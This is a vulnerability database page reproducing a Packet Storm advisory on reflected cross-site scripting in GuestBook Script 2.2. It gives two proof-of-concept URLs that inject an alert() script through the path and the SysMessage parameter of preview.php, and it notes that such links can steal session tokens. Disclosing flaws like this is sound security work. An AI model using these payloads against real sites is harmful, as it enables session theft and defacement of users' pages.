Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormCraCkErPACKETSTORM:173173
HistoryJun 28, 2023 - 12:00 a.m.

GuestBook Script 2.2 Cross Site Scripting

2023-06-2800:00:00
CraCkEr
packetstormsecurity.com
133
vulnerability
cross site scripting
guestbook script 2.2
reflected xss
manipulate content
simplephpscripts
url parameter
sysmessage parameter
rxss
JSON
`┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Vulnerability ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : https://simplephpscripts.com/guestbook-script-php/ │  
│ Vendor : SimplePHPscripts │  
│ Software : GuestBook Script 2.2 │  
│ Vuln Type: Reflected XSS │  
│ Impact : Manipulate the content of the site │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ The attacker can send to victim a link containing a malicious URL in an email or │  
│ instant message can perform a wide variety of actions, such as stealing the victim's │  
│ session token or login credentials │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09   
  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2023 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
  
Path: /  
  
URL parameter is vulnerable to RXSS  
  
https://website/preview.php/mmkpe"><script>alert(1)</script>zqufc?act=new  
  
  
Path: /preview.php  
  
GET 'SysMessage' parameter is vulnerable to RXSS  
  
https://website/preview.php?SysMessage=1krvxb%3cscript%3ealert(1)%3c%2fscript%3elxq6x  
  
  
  
[-] Done  
`
JSON